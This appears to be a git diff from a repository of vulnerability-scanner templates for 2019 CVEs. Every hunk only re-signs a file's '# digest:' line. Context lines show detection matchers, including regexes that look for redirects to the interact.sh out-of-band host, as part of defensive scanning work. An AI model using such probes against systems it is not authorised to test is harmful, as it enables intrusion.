b/http/cves/2019/CVE-2019-0193.yaml @@ -62,5 +62,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true - -# digest: 4a0a00473045022100a2208bd017be087cad3f7b31b81b12c63db065e52fff5266821228e8ef972bb00220212743e800b5e1451f8f9ffd53d6e21cdd6416e1cefd160d5d826317ba6142ac:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210084c4e4e3695799d1edd0476d769208ac85c2f1501a33c402de848fee218bff2202204d057107c9079cf90ed715df696a88c55ed772340e77d38a1e8d7e3cabebe290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index d9754badd1..eaa6ee0bc9 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ddd54c7f1f4a9cf5d87a22518f945d5e8b7db19c81b54ca2d535a3c420cef6b8022100aaff5fa1b999ebf2e978bdc019e5455def5324df0f12c0f817cb388e07a4cf24:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fd92496c3298e498848c9e6908c011d0871e99cc94218bb5288450ebb994f26d02210091108ed4587cddccaa2fda3adbba13e5615bc47dc603588f0d3556afb0ba377a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index a06d5d9678..17df1d77cb 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 500 - -# digest: 4a0a0047304502200ae8b8fb7856770fc019bdf3a6c03dd1fcaafa203a0dbfe2fc29b816d8d1d65c0221008db15d213d5ff8ce05b39936e9dff7fe592782d3a09ceed12791342185d19946:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220467a9786a5166693c6160b1434a6541f5d8635a18a235d367c70eb7a2258d4af022100ab51eaf4ba02d5f16e02b478318b98214b356491da1d6803a6e47194384d644b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index bec090ce7e..9467607ad5 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -36,5 +36,4 @@ http: - type: word words: - "" - -# digest: 4a0a00473045022100e8d24f36be00a115a4bd651787ecbd53757e29857efc3d5d8f53dfe01cffe0c8022040c3925faf200d67834ff6b5dd9ba1b24d2b402f17797e3f38df286a2bb34580:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022055ce57ad81e44273a474f1566a094310c4a4340fe02b6889c8c96d3bb23c52c5022100d3e521277ecd5cb40d75dfca186661dbb1325a88e1981247b8c39674a10d208c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index bc5b9430d6..5cc4c4440f 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 4b0a004830460221008774069eb670f076bafedb19d1b75e37cc4118d3a5e813de8f222fa4f8375c980221009771a32c51c5b1c263ddd71a7236b0eaca4cc97bce6d746d168658422c10a403:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205c3e0c2fd5e1c34c07f81266759ac7512604ba92249f9f3e923a5d77b8aa71780221008894a1ddde7fac9294d3c18699b319fffcc4a0c7ead593ffd0538be0cf65d256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index c5b1701e6e..39058cb916 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cc0a52133dc28ffa5c41b8a4d86d48c5a1fba6fe35512503b4d4d3fee92c16a9022100f6ff47e9aff55bf09d69fa1c6f35ef976246b2288d72c78be4e14f34764015ff:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e245f7e15000a663f1885b05e51d169735644fc64a4726fbcd5e9c301e045a1c022100eac738cc72e2731d7363e9e8054504c1240692297ce9fd6dab641dc4becd55d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 9f93d7933f..cdbb3cb596 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a0046304402204914ef10d1d3c8d69271b7ca9018423b2b7dafb9f34e221e6d31e0105b5d017c022033168519be63992df04bd57150e5fa1b84c854283c89112424248e0d7024acb3:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022031d842a1f9b408d2abedbd95e3276594ab712e43b3a780bef4fb48bd4b71c0240220559e133f9fef45e89904e1bbd56e87f623a92493b2c48e3d60e366d87c23863e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index fd7ca7d700..d72d47eceb 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -45,5 +45,4 @@ http: regex: - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" part: body - -# digest: 4a0a004730450220706fb86f7e03ab0876f1b0f81981ccbf0f0c9e9f5794faa8fcdc9a6b31d2af5e022100a20243dd872e3a03c36113d94511eff06bd953bccd37e44073fcebe92258bedf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bf01dec90e5dfee22105a41b8f84263e91d6997dc0d8b7af34c84d84a74b223302204cfbcd22ffbf3880d2cfa821b1a77e848bf08edc9f5a3fa75aac59ea22acedfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index a403d52c3e..819f85e4b1 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -63,5 +63,4 @@ http: - type: kval kval: - x_jenkins - -# digest: 4a0a004730450221008ef85f65ee076ddbd7d7907a034f8bb51c2022e92545ae4ee111bdf74fa298860220299391f1e777a86932f4e5a917fad684ee282bfdabecc34904206a89b48ed8b4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022079737eda86920d5e25d7a64f8d0b669d44ecbac562c364ff62b13eb720ed3df2022100fe4479a394f7d34e71bd4a0e1d8e46ed0e3454b6611049b7eb1a4ab6b8fda7de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index d3bad877ec..32d61cdf69 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210083135266169d3377af4512198971a81ec5c2c9613eca93fc32bc345c03f43800022100e69b907f47e2207d6b8bbc080c7eb4de4c5e989407b80cb3ea6e8d3b1bbc0a09:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220407aada2d2d1a99aac2d23645349527ed555dcb7b0ae695b5c01989ece1be825022100af713bca1a49017d7bb92a5506b10c0abed590157db2abf547470bb41a0a4352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index a4be116815..7fbc8246b3 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -40,5 +40,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a00473045022100f3691f452c9ee5e426f1e253013a37f2936e0caaaefabd148f2456827508698e02204c60b1b52bd73de7a27b7742c116fb12ddbdc7aa693fc039c556a44cf84d275a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220142c394da114750e8bc2fc8cdec628fa46c0ad56a8f17cf362819745db0b5f4f022100c584d45a93ec0ed5ab2496498565537db43f6cae8ad5fc78caabeb712ab8c81a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index c25cbecedf..b079b9ad6c 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022022324e181038338097e18c4297bce6b21c19601099691f494f8022c6222340390220519bb9a5560f8f01c4352364eac80f4ff176967913741c5f057479c860d8b172:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220770a6b04fab23d374e264d95e26e14473273c65de2d5f99d520bab1f48c8238802206e95b93ef84fbba8ae3d66594750d366fe0e152068acbeb71e2b9aad1896fc21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index a66ba56978..926da6b4d7 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -42,5 +42,4 @@ http: - "Profile Descriptions" - "goroutine profile: total" condition: or - -# digest: 4a0a0047304502200b794213fd94d426d275a4da9ad57b538a64e983cf7a6d337138bddffaafb04a022100f142e341387dd8332b39535620d6df7006261b1fc18fbea19e3cda921697436a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203e04555af8f81684c5e4070671f58b8e21546a173d1aa8992d94ca495e675829022070609c25242904e62e7fb6f372d04f0d79356759d382cd5ab5b9b55197d43853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 37094eda4d..f3fe4bf5d1 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -48,5 +48,4 @@ http: - status_code_2 == 200 - contains(body_2, 'value=\"\">\">') condition: and - -# digest: 4b0a00483046022100859dd3833549155c9fabfe62d724ad4b4823c0fbea00814e1c4006abe881cb560221009c3c2201e6e7f46b31914a9d5cbd90192ea49eed172b99ca33268b9d9bb8b2e5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fbe4aef3f8116c7f1a64ef65e138e6773bb20e996433e5167ba6d204e6501f33022008df78735d019c421289675fed5ed85a1f12c3110be97acf0185df306eca3770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 1dc69e7e54..6e77ca5f29 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -52,5 +52,4 @@ http: part: body_2 words: - "CVE-2019-11580" - -# digest: 490a0046304402207e1c9670af96475de2e9606932b774f32a3c13b72c56318596c3c502b87ba4a102201990e04634df25eeb0946b65cae317a4b2cc28e402de2beb3cd725c19ca41a23:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b49ba0926817fa42db4b0597d0ccbe6fcb4c116fc9a181d043cef333a2583a78022100d51456444827bd096a07217188d223b0440957beb817ca137a70d3fa7c9aaa09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index d36eb71701..d57b155b6d 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -58,5 +58,4 @@ http: - "\\(v8\\.1\\.[0-1]" - "\\(v8\\.2\\.[0-2]" condition: or - -# digest: 4a0a00473045022072869c5efc1cea803d45dbd5ad1a4ea3a14e6d690ff55aaa280b5c220a102c08022100bb180cde933508c7a4534e5f5ccc0db0bc893d5119a49d4c711d922e0cf34fcd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c8829e97b36b17a760ceb3c6183843f8e8f8fcb0001eccf527210ad13854c623022100eb642256204452c1769efdf92b2f0dfc3dd84584ef6a31cb93dcde9b7b3163df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index ef6abd3e21..8a84e2a142 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -57,5 +57,4 @@ http: - type: dsl dsl: - "contains(tolower(header_2), 'text/html')" - -# digest: 4b0a00483046022100fa8242eef7206b24fe75399056160095f77e87e506865210919c737a64717fce022100911e4a71312f400bd18df8e915017f86f5dc4472c7ab274898c4c5cee195007f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204ab4e7d0be7d269445e607de687fc5be05bb87566a1804b46fa3fdcb68703d10022100e4fc723f43e7349a1adb7227d3887274fd447dfef583d6463a538c34b5b75416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index f0f20a7054..a6fad1bddc 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022041c79f9bbb6b22a26eb3b374ef2cdf0c759f1a5f5201d4b9f2a092156d3b83620221008af9705b27e9540919d484ab94182cced94222ebe02acb7cb1478bba558fe941:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206d9c0908708076df7c86637984569064ba59074d8eed48a1f7e3ba5b3c31958402201b2c43f944331fe7a42b4e771e80ad7a545b9f43ae10010ba73bb5553ac308c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index a39fe851de..b7434b7ebd 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d26e5dd3df5937e15966689297c3b220530f0907e763ca656692701dad4e697d022100d332eefe58790ebfb4022ae5e12e274b379a2ccd0f6fab75989c0cb238813be9:922c64590222798bb761d5b6d8e72950 +# digest: 480a00453043021f3241ce3f0d9e1c692680ed8d08fb316e48b32c0ca81d3f1ce810d878dd7e2a02206662b8333f23f0ac78b6bfff51c790b72e0538f218fc9f334a9a819307dd8b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index a349399d60..361c9790d1 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008091d62437701275d0aa07b5006b24fa83fafbe899e6c379b3114d903b1f8548022100c28553d1fbe252180346f47e4f3ded1e1a4d512d6bcdb6f63cfcbd28fec02fe6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e3eba6009a3c5d909fbaefd4c65922a3387478d4845f4c0bc016fc296df3bbb702210080f73916a3425ca6f34204b2d8fb32c218aa66572eafd42b4d4f1ee23ecb4125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 82414be71a..a1bb4bcdd5 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bc409eff75ff73bb8b677880bd45b4a4a2c6c67281f06bfb87d014cf2bf5e02f022100ed44c5ace87b35446924c07d7d6046ab9270c2cc6491fba762caccb45a6517c2:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207ea0aa061b024af91bf670a06211338653cb1638f999578736a736591cfe352e02204d49b84fcdd73c1da5062b239997880086a7731be9ba2856243813824f8331d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 84c84b4dd5..40bb0f8b85 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -61,5 +61,4 @@ http: group: 1 regex: - '\?v=([0-9.]+)' - -# digest: 4a0a00473045022100968fc9434d54f288eb85dbcd00f248a182abd5a29e8a871417901f455d18c0ca022063dbca62eddabdb191d830c1a1cc871758619f9f2c718e89bc46a394e20d607d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200265bdf788c406d1a2f77e36d038ad54c0df693e0a4c1644abc974fa841a97a6022100e39919231e96d1a21fcf903b0fdaf935e1e332824700d1cde4879cf0d51f3a95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 88f0aada87..39ca31a270 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ec93f66c1e6b671d39f797626254ebfeb4e732e8e780477df4531f651fd0676d022059c04f0e8dc8f67026196ede42ede1c1ff286baa50a9a51f869eaeac7c488804:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202853eb6689ebe26128267fa9d68d013e596c687e8db1fbd789a4cfc87c0294a2022100a80af2dde77ca69dda18aeea8041fc5b3e6ebc42e92512e48627a5afd5429eb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 0e25b2dd6c..8c4353b9bb 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -50,5 +50,4 @@ http: - status_code_3 == 200 - contains(body_1, "Citrix SD-WAN") condition: and - -# digest: 4a0a0047304502206bd2c67c9d7604880ccecc358c04e49138e0d99eef98c4cf124c395c3c1cd21f022100a2243c77f42f108b7a5580de1044072912962f5f79d737bb6f7619a8b3d0cebc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a32d8e711bc548d363bb7b1e065ebe2030aa70f5b13667a51b1d23be92e66294022100a3c9da101a720843ddba5d127b1151846ed539a8e58c4ab90a8157bbdf54e935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index 4f4e22750c..718ea975d7 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210098a482f89ee61fb4eb4453a477acbfec0ad05def62f33d247e8e6b5d40bf517a022100a5cc3bc31d2a427436de9e818c8e90ae5d2f450088b08bf7a64177dc62d4ebf9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ae126f0e84860b0d548f299a4e5f086386c571a40ba36268791a81bf64346c9402210082ac1034aa13218dee9367331017ed63b3b6d96e458f8d0e0c111bfc430647db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 416e98e9c9..37ac9f08ef 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -47,5 +47,4 @@ http: part: header words: - text/html - -# digest: 490a00463044022055e8c535fbe0edd939ff4dc3412888049e799a2617f971ca714634a3448abcb502202a9dd1c55da0e25ba526be462e171e8d78e3281f790e13254d7f7990c0c1da73:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ebe0c21fe23c29c02c2a64e969ad7995a13baa8ee3ad16ead52acf94fa390085022100cdeec6ba43861dff4ca638a2039671f94bbf2005607c11c762cc886f6eefa6e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index 7af9bcdf76..995c265512 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -56,5 +56,4 @@ http: - "idden' name='form_token' value='([a-z0-9]+)'>" internal: true part: body - -# digest: 4a0a0047304502206c3e71d8c0a4226e95c05f2ba0e41be1298059c913a422f0befbd7b85fedd78a022100f253a86b59804113c9c9e97a9ef95653836573b93e2f329b904b25ba375656d8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206f33a4bc297deba3a20c2c210566910ec68dc04da2a7f4c010065d7721949286022100f82b13d816d186e5c79f963c017b6428b40e63cd818f74a96e5bc8f00fbedff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index 6d4644284d..6f90d04afd 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 500 - -# digest: 4a0a004730450221008eb08976797992858266962fa8ac6223e4f37c6c9bb25eef18728e7ac80e8c0e022070f5cb051495a90c8ec60ccfc01c5e812913a823449b2b1247a66f88013db5ad:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008144d2f89a94c884adf5b48a14ad424fd384274efacb4a5c7fe2d0ab6e6396b90221008511aab5a2279da07b5a49933dfa9631bfa58b1f4d81d8ccac33ea2f5b62123e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 85b190a8de..30c1c82518 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202ffe9839ea08f233a4dd7a36956b453dd5f73519600b2ee2f570494127aa8f4a0221009f3d1bcb2d5f51b6cbea6c9d622bb50b95ccafafe19e6edb11370eb4a55de8ea:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b95c8fffdd5ed06960d5b849e5b1a118338b1b413e5506433022b37d7ec406810220091f2b56cf8be4c15769107f69b3e0921b9dbc28b45e961fd55602e1abde6453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 265ccc58c3..58b0a0eb3a 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -40,5 +40,4 @@ http: part: header regex: - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$" - -# digest: 4a0a004730450221009cac18202eda8c0f2aba4696c83f40e3ee2464b5464327be3ad05b0c98cd9f910220718ed8200a3017fac9361262949eee2b76c8aef90bd1bfb800f0673c0ecc24d3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207d262574abfdee961f7dee96604c98fa8fc5822937ac83e28a6b87085df0ffa602207cbf22f173733d3163ecb2363002ab6efbdcc3a14b312534c7f313a9f00af1d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 209aca697e..7b46758cf4 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202bf5b8f1e574f538b93ef1ddc153113634668549b47c8934a467c1341bac22bb0220049fe6e33ad60ead19d8f04e73126f2fda0719d5947b0bf5afac1f8dff314589:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201779e0615c4ff3fa4669fefc2b4c7053d4413d41c3d067db95656c4f421c91c102206503d68affbfc7effdc4993c53afd0afe396328ad4ba47cd7ceafce3b7d29d71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 5a123aef67..507bdabdd1 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022011116d82e743ab0fd16798093b299b76ff2ce7ebe3521c922cfadb620d146c0b022100f6dcde1f716081787b01ba3a1f24d0642fa488462ec4b93e9922b40551f2783a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210096a61864931254160e99acc2accbda65d739d50cdbef9e419b685b7203283593022100f4c03d086cb605e02dae4cde2df3d0211fb228e43b43fea65e546639c2f2cbfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 109ec4905f..f6eda691a0 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a535b268df0893914920a42dd6b7fec1f1c5687287fb03aab32a906bd33d2dc8022100a1e3137b0b2dc0cfb9511eb211b2430f587aa8ecafc81f67bb02e68fcb7785e9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b634a6ed0074d9e826cedebf0109af1a2e6851ea65fd542de6105931992d735f02205eb3f96b069b2fe1a73bc1e8ee93e81dc0e566a15656e69c17d50f78381f13d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index a17b5e753f..e3b05ea6fa 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022053cd1fe8b5c55739445c76772fcb0ac276f447217f1860838f1e7ccf5490c134022100b26df68fda7ab8a4d4335d1ac5e0bed888aa5b8c00e23592f630bbd21303f2d5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bec1619093ad1d46bec7b7f0c3e62c5204538e348e259ff8ae04c336fcf5304802204964cd9d42c3a782ba26af3b8250e50f9a3b168241c75950ac17689ad0a5bfe3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index 7c59dcf42c..cba1c08dc8 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d23c905bcf3a3184ae7a9f6d17010807df88dbda3832472301680e990d67dcb50220222995e776c442231a0d974ba647a83c7659bfb67b0d52235b7d15a7d8a4e0fc:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022028435d814cf8304e2c84b4d282efc61e8bcc6c99826ca6054fcca9b67d903c5c02202dadce2b656b9bf40b1a55e97411b16bf5399a146a40aad20aedcabdafa40dba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index b504a8b9e4..786f567cc9 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220704a4af36f1ea0565ad6e45f9c262ada0e960ce00121231aa05d571dcace14e10221008f0e8aa504a24a55570725697da55945872c9bbde27ae62577407f520a392456:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022075c00e20485d8290d9d7fa0b1c68a22bcdc88079762824cdad545c47c10d8abd022041005990cb7ae423b0f3230f2f977619735b596e568b1dedb2526270c7cadc4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 2a21cf1d48..0f11631c09 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -84,5 +84,4 @@ http: regex: - '__CSRFToken__" value="(.*?)"' internal: true - -# digest: 4a0a00473045022100998e8da4d6c5ff5edbb0cc3a0040083d119ef648029fa94034b1ce8652386e96022013ccf5ae700f4c47abdb2d18be1aba3891300b2c8a20f8dfa79e916f0c94e186:922c64590222798bb761d5b6d8e72950 